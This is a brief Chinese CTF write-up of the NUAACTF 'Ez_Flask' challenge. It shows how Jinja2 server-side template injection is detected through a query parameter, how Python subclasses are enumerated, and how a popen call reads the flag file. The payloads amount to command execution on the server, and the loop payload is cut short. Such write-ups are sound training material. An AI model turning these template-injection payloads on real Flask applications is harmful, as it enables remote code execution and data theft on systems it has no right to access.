【NUAACTF】Ez_Flask
按照提示随便传一个:?name=123
可能存在模板渲染,检测一下:?name=${2*7}
?name={{7*7}}
?name={{7*'7'}}
发现是 jinja2 渲染
看一下所有的类:?name={{[].__class__.__base__.__subclasses__()}}
可以一点一点的往下找,也可以直接写payload
1 | {% for c in [].__class__.__base__.__subclasses__() %} |
直接拿flag popen("cat flllll11111114aaaaaggggggggggggg").read()
- 标题: 【NUAACTF】Ez_Flask
- 作者: Itachi
- 创建于 : 2021-12-27 17:57:32
- 更新于 : 2021-12-27 20:01:49
- 链接: https://blog.tarchi.top/ctf/【NUAACTF】Ez-Flask/
- 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论